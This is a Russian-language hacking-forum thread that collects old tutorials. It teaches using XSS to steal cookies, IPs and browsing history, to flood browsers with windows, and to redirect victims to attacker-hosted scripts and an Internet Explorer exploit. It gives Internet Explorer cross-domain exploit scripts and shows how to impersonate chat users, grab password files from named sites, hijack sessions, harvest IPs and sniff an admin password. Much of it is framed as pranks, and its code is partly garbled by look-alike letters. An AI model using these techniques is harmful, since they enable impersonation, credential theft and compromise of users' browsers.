      Но XSS-баги не ограничиваются кражей сookies. Собственно, кульминационный абзац:). Что же позволяют осуществить нам XSS-уязвимости? 1)Всевозможные «подлянки», связанные с ограничением пользователей в нормальной деятельности на сайте. Например, вывод бесконечного числа окон (пример ниже) или сообщений (метод confirm или alert), как результат какого-либо действия пользователя (нажатие, наведение мышью на объект, просто заход на сайт). Или же переадресация на другой узел. Попробуйте внедрить вот этот код (без изменений) в уязвимый сайт: window.loсation.href="http://hackzona.ru" Также, сперва протестировав на своём компьютере, попробуйте следующий скрипт. Создайте файл 1.html с таким содержанием: <Нtml>*** for (i=1;i]0;i++){oрen('1.html','new'+i);} и откройте его в любом браузере. 2)Кражу конфиденциальной информации посетителя. В первую очередь сюда я отнесу кражу сookies (doсument.сookie) как самый важный атрибут безопасности пользователя (в этом разделе). Также в этот раздел входит кража информации о системе пользователя и браузере (объект navigator), текущем времени, IР-адресе, а также истории посещённых сайтов (объект history как массив; текущая страница history[0], предыдущая history[-1], всего страниц history.length) и многое другое. Вот пример скрипта, возвращающего IР-адрес посетителя в переменную IР и имя компьютера в переменную host (проверено в Oрera, Mozilla, Mizilla Firefox): myAddress=jаva.net.InetAddress.getLoсalHost(); myAddress2=jаva.net.InetAddress.getLoсalHost(); host=myAddress.getHostName(); iр=myAddress2.getHostAddress(); 3)Всё, что умеют СGI-, РERL-, PHP-, ASР-скрипты. А это - всё что умеет JS + много приятных мелочей. То бишь это второй способ кражи конфиденциальной информации. Он гораздо удобнее, т.к. приходится внедрять не весь код в HTML-страницу через бажную переменную, а всего лишь ссылку на скрипт; тем более у этих скиптов больше возможностей. Минус в том, что это более палевный (при нерациональном использовании) и немобильный способ, тем более жертва может каким-либо образом просечь нежелаемую загрузку. Например, ты внедряешь в HTML-станицу следующий код: window.loсation.href="http://hackzona.ru/haсkerssсriрt.php" Здесь hackzona.ru – это сервер хакера, а haсkerssсriрt.php – это скрипт хакера, выполняющий те или иные действия. Зайдя на взломанную страницу, жертва переадресуется на скрипт http://hackzona.ru/haсkerssсriрt.php, который сделает своё дело (если жертва не прервёт загрузку). Естественно, есть менее палевные способы загрузки скриптов, нежели window.loсation.href ; я привёл его только чтобы стало ясно. 4)Непредусмотренные стандартом возможности браузера. Существует множество уязвимостей браузеров, которые при обработке какого-либо кода или вызывают DoS, или предоставляют доступ к определённым файлам, или позволяют выполнять произвольный код в системе пользователя, или ещё что-нибудь не очень приятное для юзера. Множество известных и часто используемых браузеров (Internet Exрlorer, Netsсaрe, Mozilla, Mozilla Firefox, Oрera и всё что создано на их движках) уязвимо. Неуязвимы лишь некоторые их версии или же пропатченные браузеры. Совсем недавно (на момент написания статьи) Бенджамином Тобиасом Францем была обнаружена критическая уязвимость браузера Internet Exрlorer (v5.5, 6.0), позволяющая выполнить произвольный код в системе пользователя. Как же выполнить произвольный код у пользователя, который зашёл на сайт, имеющий XSS-уязвимость? Зальём эксплоит, написанный Стюартом Персоном (взять его можно отсюда: myphp4.h15.ru/0day-exрlorer.rar или с сайта seсuritylab.ru), состоящий из четырёх htm- и одного html-файла, на наш сервер, например, сoolhaсker.yo. В уязвимом сайте внедрим следующий код window.loсation.href="http://сoolhaсker.yo/0day.html" Теперь, жертва, зайдя на страницу сервера, в которую мы внедрили код, переадресуется на страницу-эксплоит -- которая выполнит произвольный код (в нашем случае запустит сalс.exe). Вот и всё, чем я хотел бы с тобой поделиться на данный момент. Как видишь, возможности XSS-атак очень велики. Ты можешь устраивать массовые приколы и подлянки, воровать информацию и конфиденциальные данные и даже строить целые ботнеты, зомбируя посетителей сайтов! XSS-баги будут всегда, так как они подвергают опасности в первую очередь посетителей сайта, но не сервер; и у администрации мало стимула исправлять эти ошибки.  Примечание. Все знаки «меньше» и «больше» заменены соответственно на «<» и «>».

0

8

Что такое Cross-Domain Scripting и с чем его едят?


     В основе уязвимостей типа CDS лежит понятие «домена». В данном контексте смысл этого понятия несколько отличается от общепринятого. «Домен» - это уже не просто адрес сайта в Интернете, и даже не «область пространства иерархических имен сети Интернет», - данное понятие обозначает некоторую «границу безопасности» (security boundary), выходить за которую не разрешено ни одному пользовательскому скрипту. В основе модели безопасности любого веб-браузера лежит тот принцип, что ресурсы различных доменов (странички, скрипты и т.д.) не могут никоим образом пересекаться друг с другом, т.е. получать доступ к внутреннему содержимому и данным друг друга. Если бы это было возможно, то, например, скрипт на домашней страничке юного хакера Васи мог бы получить доступ к данным почтового ящика на Mail.Ru ничего не подозревающего пользователя, которого Вася заманил на свою страничку. Вот было бы веселье:)! Более того, согласно архитектуре Windows и концепциям построения современных браузеров, любой сетевой ресурс в локальной сети и собственная файловая система клиента это тоже «домены», а значит к ним возможно обращение из скриптов точно так же, как к любому ресурсу в Интернете! Собственно именно локальная файловая система клиента и является чаще всего целью cross-domain атак. В тоже время взаимодействие между собой ресурсов (страничек и скриптов) внутри домена (и всех его субдоменов!) концепцией безопасности Microsoft разрешено и в принципе никак не ограничено. Трудно судить правильно это или нет, но то, что так проще:) и при этом расширяются возможности веб-серфинга, - это точно. Cross Domain Scripting [ Безопасность для новичков ] Введение. Идея написать эту статью мне пришла в голову после того, как понадобилось дать одному новичку ссылку на подробное и понятное объяснение этого термина. Полазив по поисковикам, я с удивлением обнаружил, что найти такую статью достаточно непросто. Термин либо не объяснялся вообще, либо в двух словах и по-английски:). Между тем в Windows уязвимости такого типа обнаруживаются довольно часто и они более чем серьёзны! Поэтому в этой статье я попытался как можно подробнее и понятнее описать этот тип атак, особенности эксплуатации данного типа уязвимостей и защиты от них, привести конкретные примеры. Статья писалась в основном, конечно, для новичков, но, надеюсь, будет чем-то полезна и для более опытных читателей. Что такое Cross Domain Scripting? Изначально Cross-Domain Scripting (CDS) был связан с недостатками в модели безопасности всем известного «ослика» aka Internet Explorer (IE). Однако, т.к. архитектурные особенности современных браузеров не сильно отличаются друг от друга, то атакам данного типа в настоящее время подвержены практически все известные веб-браузеры. Тем не менее, существующие отличия между программами этого класса приводят к тому, что чаще всего найденный CDS является «браузерозависимым», т.е., например, работает на IE, но не работает на Opera или наоборот. Так что же такое Cross-Domain Scripting? В контексте всего вышесказанного этот термин можно перевести как – «междоменный скриптинг», т.е. «пересечение скриптом границ домена» - нарушение той заветной линии безопасности, выход за которую дает доступ к данным других доменов, в том числе к локальной файловой системе клиента. Такое нарушение чаще всего сопровождается возможностью записывать и выполнять произвольный HTML и Java код в контексте других доменов, читать данные других доменов (например, формы с паролями или файлы на системе клиента) и даже выполнять произвольные команды на удаленном компьютере. Часто понятие «cross-domain scripting» подменяют понятием «cross site scripting» (XSS). Действительно, зачастую бывает, что внешние проявления этих уязвимостей очень похожи, - особенно, когда в результате CDS происходит вставка Java-кода в контекст другого домена. Однако, несмотря на сходство, суть этих уязвимостей различна: Во-первых, область действия XSS по определению ограничена одним доменом. В то время, как CDS в общем случае подвержены все домены + локальная файловая система клиента. Во-вторых, причина XSS уязвимостей кроется в ошибках скриптов, расположенных на сервере, и, как правило, заключается в недостаточной фильтрации данных, полученных от пользователя. Источник CDS уязвимостей – клиентское программное обеспечение (браузер и операционная система), и он обычно никак не связан с пользовательскими данными. Ну и не надо забывать, что уровень опасности от успешной эксплуатации злоумышленником XSS намного ниже, чем от CDS. Ведь в первом случае, как максимум, произойдет утечка конфиденциальных данных пользователя (пароли и т.д.), причем лишь с одного сайта, а при CDS возможно похищение конфиденциальный данных с любых сайтов, а зачастую и исполнение произвольных команд на системе клиента, что позволяет взять над ней полный контроль. Во-вторых, причина XSS уязвимостей кроется в ошибках скриптов, расположенных на сервере, и, как правило, заключается в недостаточной фильтрации данных, полученных от пользователя. Источник CDS уязвимостей – клиентское программное обеспечение (браузер и операционная система), и он обычно никак не связан с пользовательскими данными. Ну и не надо забывать, что уровень опасности от успешной эксплуатации злоумышленником XSS намного ниже, чем от CDS. Ведь в первом случае, как максимум, произойдет утечка конфиденциальных данных пользователя (пароли и т.д.), причем лишь с одного сайта, а при CDS возможно похищение конфиденциальный данных с любых сайтов, а зачастую и исполнение произвольных команд на системе клиента, что позволяет взять над ней полный контроль. Подробнее об XSS можно почитать Antichat.Ru. Как это работает? Так почему же становится возможным данный тип атак? Причина заключается в том, что та самая «линия безопасности» между доменами создается искусственно, что всю работу по предотвращению междоменного скриптинга выполняет веб-браузер и его компоненты – нет архитектурных ограничений. А значит, всегда есть вероятность ошибки в процедурах проверки, возможность их обойти, что в настоящее время с успехом и делается. За более чем десятилетнюю историю использования веб-браузеров было найдено множество способов преодолеть заветную границу домена. Однако большинство из них можно условно разделить на два класса: 1.Эксплуатация ошибок безопасности в объектно-ориентированной модели браузеров; 2.Использование промежуточного звена для выполнения атаки. Рассмотрим подробнее данные классы атак. В основе первого лежит ярко выраженная объектно-ориентированная архитектура современных браузеров и виртуальной машины Java. Действительно, все, что мы видим на экране веб-браузера, это объекты определенных классов с их свойствами, событиями и методами. Используя эту объектно-ориентированную модель и скрипты Java, мы можем обращаться к любому элементу загруженной в браузер странички, читать и записывать в неё данные, открывать новые окна и т.д. Более того, с помощью скриптов возможно частичное управление элементами самого веб-браузера и даже действиями пользователя: перемещение «Вперед»/«Назад» по страничкам, добавление в «Избранное» и т.п. Однако отдельные окна или элементы странички в веб-браузере могут принадлежать разным доменам, а значит нужно пресекать обращение к ним. Нельзя допустить, чтобы пользовательский скрипт, открыв другой домен в новом окне браузера, имел возможность что-либо записать туда или считать оттуда. Нельзя допустить, чтобы скрипт на страничке с фреймом, куда подгружен ресурс с другого домена, смог обращаться к этому фрейму и получать доступ к его данным. Более того, утечка данных от одного домена к другому возможна не только через свойства, но и через методы и события объектов! Скажем скрипт на страничке юного хакера Васи, куда он заманил ничего не подозревающего пользователя, не должен «знать» какие клавиши тот нажимает, когда вводит пароль для входа в Mail.Ru, открытый в другом окне браузера. Ну и таких примеров можно привести очень много! К сожалению, а может и к счастью;), такие проверки безопасности зачастую выполняются некорректно, а иногда и отсутствуют вовсе! Поэтому становится возможным обращаться к элементам страничек с других доменов, считывать из них данные, записывать свой Java код в контекст других доменов и т.д. Из-за достаточно сложной архитектуры объектно-ориентированной модели такие «дырки» в ней находятся довольно часто. Ниже приведен пример данного класса атак (Пример 1). Для выполнения атак второго класса используется некоторое промежуточное звено. Что делать, когда прямое обращение к другому домену запрещено? Правильно! Идти в обход! А вдруг есть кто-то иди что-то, кому это обращение не запрещено, и оно сможет считать оттуда данные и передать нам, или наоборот – записать наши данные в контекст другого домена. Наиболее уязвимой с этой точки зрения оказывается технология ActiveX от Microsoft. Технология ActiveX предоставляет в распоряжение пользователя объекты, их свойства и методы, которые используются операционной системой для каких-либо вспомогательных целей. Например, для просмотра через веб-браузер файлов справки Windows (*.chm) используется HTML Help ActiveX компонент. Не правда ли удобно? Однако зачастую объекты ActiveX выполняют роль своего рода «троянских коней»! Дело в том, что существует способ управлять этими компонентами (загружать, обращаться к их свойствам и методам) через веб-страничку. Для этого используется тег . А ведь зачастую эти ActiveX объекты содержат методы манипуляций с файловой системой, запуска приложений, навигации по веб-страницам и т.д. Т.о. появляется возможность извне производить все эти действия и более того осуществлять полноценный обмен данными с жертвой! Например, читать содержимое локальных файлов клиента и отправлять обратно скрипту эти данные, или с помощью ActiveX объекта открывать другой домен и записывать в его контекст свой Java код. Именно с помощью данного класса атак иногда удается добиться выполнения произвольного кода (запуска cmd.exe с нужными параметрами) на системе клиента. В настоящее время данный тип CDS также широко распространен и постоянно находят новые уязвимые ActiveX объекты. Ниже приведен пример такой уязвимости (Пример 2). Кроме рассмотренных классов CDS существуют и другие способы обхода междоменных ограничений. Правда, зачастую эти способы являются весьма экзотическими и встречаются нечасто. Например, обнаруженная в июле 2004 года Cross-Cookie уязвимость (http://www.westpoint.ltd.uk/advisories/wp-04-0001.txt). Она позволяла при определенных условиях получать доступ (читать/записывать) к кукам других доменов. Причем это был один из немногих случаев, когда уязвимыми оказались многие браузеры: IE, Mozilla, Opera, Konqueror. Т.о. CDS является в настоящее время очень распространенным типом атак и постоянно обнаруживаются новые способы эксплуатации этих уязвимостей («вектора атак»). Примеры CDS Чтобы все описанное выше было понятней – рассмотрим пару примеров реальных CDS уязвимостей. Все они были найдены в Internet Explorer и позволяют вставлять свой Java код в контекст других доменов. Обычно это используется для хищения кукисов или выполнения произвольных действий в рамках текущей сессии пользователя. Пример 1. Similar Method Name Redirection Cross Domain Vulnerability – CAN-2004-0727 (MS04-038) Эта уязвимость была обнаружена в июле 2004 года и связана ошибкой безопасности в объектно-ориентированной модели IE (1-ый класс CDS уязвимостей из рассмотренных выше). Суть её в следующем. Как известно, чтобы загрузить в текущее окно браузера другую страницу (возможно из другого домена), можно использовать свойство location.href или метод location.assign(). Однако, после загрузки требуемой страницы дальнейшее исполнение Java кода текущего скрипта невозможно – иначе скрипт мог бы подгрузить Mail.Ru и выполнить в контексте этого домена произвольные действия. Однако оказалось возможным обойти это ограничение путем редиректа (перенаправления) метода location.assign() на точно такой же, но другого окна (ведь у нас объектно-ориентированная модель и мы можем присваивать методы различных объектов друг другу). В результате появилась возможность исполнять Java код в контексте текущего окна, но уже после загрузки требуемой странички – что и требовалось! Следующий скрипт выполняет требуемые действия: w=window.open("jаvascript:setInterval(function(){try{x=opener.location.href;}catch(e){location.assign('jаvascript:alert(document.cookie)');window.close();}},100)"); w.location.assign=location.assign; location.href="http://localhost"; Вначале открывается новое окно, которое в цикле ждет загрузки странички (в нашем случае с localhost) в главное(текущее) окно. Тем временем скрипт переназначает методы location.assign() и начинает загрузку в главное окно требуемой страницы (localhost). Как только загрузка заканчивается, в цикле нового окна срабатывает триггер, методом assign() вставляется Jаva код (из-за переназначения методов вставка происходит в контекст главного окна) и новое окно тут же закрывается. В результате выполнения скрипта в контексте localhost исполняется dоcument.cookie. Видимо разработчики Microsoft не предусмотрели возможность редиректа функций и не вставили проверку безопасности (или вставили некорректно) в данное событие. Для эксплуатации данной уязвимости необходимо, чтобы в браузере был разрешен Active scripting. Почитать подробнее об этой уязвимости и найти рабочий пример эксплойта вы можете здесь: http://greyhatsecurity.org/similarmetho … ssion.htm. Пример 2. DHTML Editing Component ActiveX Control Cross Domain Vulnerability CAN-2004-1319 (MS05-013) Данная уязвимость была обнаружена в конце прошлого года, но исправлена лишь в феврале. Она относится ко 2-ому типу CDS атак из рассмотренных выше, т.е. использует промежуточное звено (DHTML ActiveX) для проведения атаки. Для успешной эксплуатации уязвимости необходимо выполнить следующую последовательность действий: 1.Загрузить DHTML ActiveX. Это делается при помощи тега . 2.Загрузить в ActiveX объект нужную нам страницу (произвольный домен). Это делается путем выполнения в контексте DHTML ActiveX нашего скрипта. exploit.DOM.Sсript.execSсript("window.name="new";open("http://localhost","new");"); 3.Ну а после этого уже можно вставлять наш HTML и Java код. Он будет выполняться в контексте загруженного домена. Все просто до безобразия:)! exploit.DOM.Sсript.execSсript("alert(document.cookie)"); Каковы же причины данной уязвимости? Я бы выделил их две: Во-первых, возможность извне выполнять произвольные скрипты внутри ActiveX объекта – на мой взгляд, это слишком большая вольность! Во-вторых, при загрузке страницы в DHTML ActiveX туда загружается ВСЁ – даже кукисы! Вопрос: зачем? Данный ActiveX объект может использоваться для редактирования страниц и зачем там нужны кукисы – непонятно… Естественно, для эксплуатации этой уязвимости необходимо, чтобы в браузере было разрешено выполнение ActiveX. Почитать подробнее об этой уязвимости и найти рабочий пример эксплойта вы можете здесь: http://greyhatsecurity.org/abusiveparen … ssion.htm. Как защититься? Защититься от междоменного скриптинга не так просто. Т.к. варианты эксплуатации («вектора атак») этих уязвимостей очень разнообразны, то большинство мер будут иметь весьма ограниченный и временный характер. Перекрыть все «вектора атак» практически невозможно. Поэтому я дам несколько рекомендаций, которые способны лишь снизить риск успешной атаки, но не защитить полностью. 1.Соблюдение осторожности при веб-серфинге. Для успешного выполнения почти всех разновидностей CDS необходимо вначале заманить ничего не подозревающего пользователя на страницу-эксплойт, после чего он подвергнется данной атаке. Нельзя доверять ссылкам, как бы невзначай, подкинутым в разговоре, различным «домашним страницам» и т.п. Это наверное главная рекомендация из всех. К сожалению грамотно примененная XSS может перечеркнуть всю осторожность. 2.Оперативная установка заплаток для операционной системы и браузера. Обычно для всех опубликованных в Интернете уязвимостей производитель (даже Microsoft:)) в короткие сроки выпускает исправление (заплатку). Оно защитит от данной конкретной уязвимости, но не от других, еще не найденныхJ (или найденных, но не приданных огласке). Естественно, рассмотренные в примерах уязвимости уже давно исправлены Microsoft, и кто захотел, тот уже позаботился о своей безопасности. 3.Отключение в браузере ActiveX и Active Scripting. Эта мера сделает невозможным запуск в бразере ActiveX и выполнение Java или VBS скриптов. Это действительно сделает неэффективными большинство CDS атак, правда может существенно отразиться на функциональности посещаемых сайтов. Однако не всегда CDS для успешной атаки требует поддержки от браузера ActiveX или Active Scripting – и это не панацея от всех бед! 4.Работа в Интернете только с ограниченными правами. Выполнение этой рекомендации позволит, даже в случае успешной атаки, снизить возможный ущерб от неё. Как известно браузер (а значит и все скрипты в нем) запускается с правами текущего пользователя. Не дайте хакеру Васе получить cmd.exe с правами Администратора:)! Следование всем этим рекомендациям поможет стать трудноуязвимым для Cross-Domain Scripting! Заключение. Вот пожалуй и все, что я хотел рассказать об атаках класса Cross-Domain Scripting.  , а пойдут искать CDS уязвимости в IE:). Я думаю, их там еще достаточно!

0

9

Прочитав нижеследующее, ты узнаешь, как войти в веб-чат под любым чужим ником! Данная дока предназначена только для того, чтобы указать разработчикам веб-чатов на их ошибки! Автор не несёт никакой ответственности за моральный ущерб, причинённый модераторам и юзерам!!! Способ #1. В чате должны быть разрешены таги в именах. Если не знаешь, что такое таги (теги), то читай способ #2. Я свои эксперименты проводил в чате wwwdivan.ru - всё работало на ура. Однако сейчас на диване этот способ уже не работает. Итак, выбираем жертву. Ник жертвы не должен быть слишком длинным. Максимальная длина ника жертвы = ограничение длины ника минус 13. Также в нём желательно отсутствие извращённых цветов. Итак, жертва выбрана. Теперь вводи в качестве ника &ltfont&gtnick</font> (это нужно вводить не в поле "Логин", а в поле "Ник"), где "nick" - ник жертвы и веселись! Если у жертвы не тот цвет ника, что даётся в данном чате по умолчанию, не забудь сменить цвет. Если позволяет ограничение длины ника, то сделай это параметром color. А если в чате кто-то уже подделал ник описанным здесь способом и вовсю прикалывается над бедным юзверем, который думал, что зарегенный ник может использовать только он, то можно добавить веселья, написав в качестве ника следующее: &ltfont></font>ник_жертвы и тогда вас там будет трое с одинаковыми никами. В-) Да, кстати, в чатах, где разрешены таги в именах, у некоторых после ника стоит значок ®. Чтобы он отображался, надо писать ник так: ник&ampreg - будет отображаться как ник®. А чтобы отображалось так: ник® - следует писать: ник&ltsup>&ampreg</sup>. Для ясности пример. Требуется подделать ник "Баклан®". В качестве ника вводим следующее: &ltfont>Баклан&ltsup>&ampreg</sup></font>. И не забываем поставить нужный цвет в настройках.
Способ #2. Способ основан на использование в нике одновременно русских и английских букв. Объясняю на пальцах: буквы Е, Р, О, В (не буду перечислять весь алфавит) есть и в английской, и в русской раскладках клавиатуры, только произносятся по-разному. Буквы, которые можно заменить на похожие в другой раскладке клавиатуры, нужно заменить. То есть, например, ты хочешь напугать чувака с ником Ламер. Тогда в поле ввода ника пишешь буквы "Л" и "м" в русской раскладке, а буквы "a", "e" и "p" в английской. Если подделываешь ник Lamer, то буквы "L", "m", "r" пиши в английской раскладке, а "а" и "е" в русской. Програмное обеспечение чата думает, что у тебя и у настоящего владельца ники разные! В принципе, так оно и есть, только вот выглядят они одинаково. В-) Способ №2 работает в 90% чатов, в том числе на диване. Но не в 100%!!! Поэтому не надо донимать меня вопросами типа "в чате N нифига не работает!". Желаю успеть привести в ужас весь чат, пока тебя не выкинет дядька админ!

0

10

Существует несколько способов простого хищения паролей из чатов. Если чат расположен на сервере apache, и проверяет имена пользователей по файлу htpasswd (при этом ваш браузер выкидывает окошко с предложением ввести имя и пароль для доступа к ресурсу), то всегда есть вероятность, что нерадивые администраторы положили его в доступный каталог. Можно для этого воспользоваться URL типа http://www.somechat.com/c hat/.htpasswd. Точное расположение файла можно узнать стянув файл.htaccess из данной директории. Это, обычно не удается. Но часто удается стянуть его копию, которая осталась с последнего редактирования файла, например http://www.somechat.com/c hat/.htaccess~ или http://www.somechat.com/c hat/.htaccess.old (в том случае, если копии этих файлов любезно оставлены администратором). Если чат расположен на Микрософтовском сервере и использует ODBC для доступа к базе данных паролей, то можно попытаться стянуть файл с базой, например если она имеет формат Microsoft Access и хранится в том же каталоге, то достаточно просто угадать ее имя, чтобы получить полную информацию обо всех пользователях вместе с паролями  Классический пример - чат "Пластилин" (я уже послал уведомление администраторам чата): http://www.plastilin.nnov.ru/ talkzone/talkzone.mdb Следует сразу заметить, что почти все сказанное выше справедливо не только для HTML-чатов, но и для других WEB-сервисов, таких как доски объявлений (WWW-boards) или гостевые книжки.

0

11

В любом чате фрейм, в котором ты пишешь сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа input type=hidden name=cookie value=SP202134(так в партизанах хранится UserID) Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, что бы можно было с ним работать со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh.pl на полный путь wwwchat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа input type=text name=cookie value=SP202134 (что бы можно было их изменять) После этого делаем HTML документ для "сборки чата" из кусков. Т.е. примерно так "First.htm" Start.htm - это и есть тот фрейм который я сохранил и изменил После этого я просто браузером открывал эту страницу (First.htm). И сразу(!!!) попадал в чат, минуя стандартную процедуру входа. Это позволило :
1. Обходить зарегистрированные имена
2. Прятать свой IP от киллеров, за счет взятия чужого ID'a Дальше мне стало интересно вычислить IP участников. Я обнаружил, что не запрещен тэг . Это позволило вставлять в свое сообщение ресурс со своей машины. Сам по себе звук на хер не нужен, но этот косяк позволил вставить в свой месс строку типа . Этот скрипт (spy.exe) вызывался с машины каждого участника чата. Это позволило увидеть IP всех (скрипт просто сохранял мне на винт данные из переменной окружения REMOTE_ADDR). Это мне не очень понравилось, так не понятно было где чей IP. Примерно в это- же время в чате появились приваты. Это значит, что документ в главном фрейме (тот где мессы все) стал называться по другому. До приватов : http://www.chat.nsk.su/cgi-bin/refresh. … zgovor#end После появления приватов : http://www.chat.nsk.su/cgi-bin/refresh. … 345678#end Где SP456789 - UserID После этого в скрипт (spy.exe) был добавлен вывод ID'a из переменной окружения HTTP_REFERER Ну а сопоставить ник с ID'ом не проблемма, тк ID каждого прописан там же примерно в такой строке Тут ник "/cgi-bin/private_form.cgi?SP448188" (Это строка взята из правого фрейма, где можно вызвать функцию "Кто в чате") После этого перестало быть проблемой сопоставление ника и IP. Затем я решил позабавиться с приватами. Используя метод сохранения странички на винт (описанный выше), я получил форму для отправления приватов от КОГО-ТО КОМУ-ТО. Т.е. я смог в отсылаемом приватно сообщении проставлять имя отправителя. Осталось только одно. Я знал, что в чате есть киллеры, но ничего не знал про то, что это, где это, как это. Знал только, что для того, чтобы киллерствовать надо зайти на какую-то страничку. Очевидно, что в этой киллерской страничке показываются имена. Я предположил, что моё имя показываются таким, каким я его ввожу. Исходя из этого, я под именем MyNick зашел в чат (через прокси), и начал легонько ругаться (мне надо было, чтобы киллеры зашли на свою страничку). После этого (когда меня убили) я разгреб лог моего ВебСервера (OmniHTTPd beta) и увидел там обращение со страници не относящейся к известным мне страницам чата. Я полез на эту страницу и получил запрос на ввод пароля, со словами "Дорогой администратор...". Это приятно согрело душу. Дальше я начал думать, то ли подобрать пароль, то ли ещё что придумать. Но ситуация так сложилась, что я оказался в одной сети с киллером, и, запустив сниффер, я поимел пароль. Ну вот и все. P.S. Ни один из этих приколов уже не работает в партизанах, т.к. это был "дружественный взлом" и обо всем, что я нашел, я рассказал создателю чата. Он все косяки исправил.

0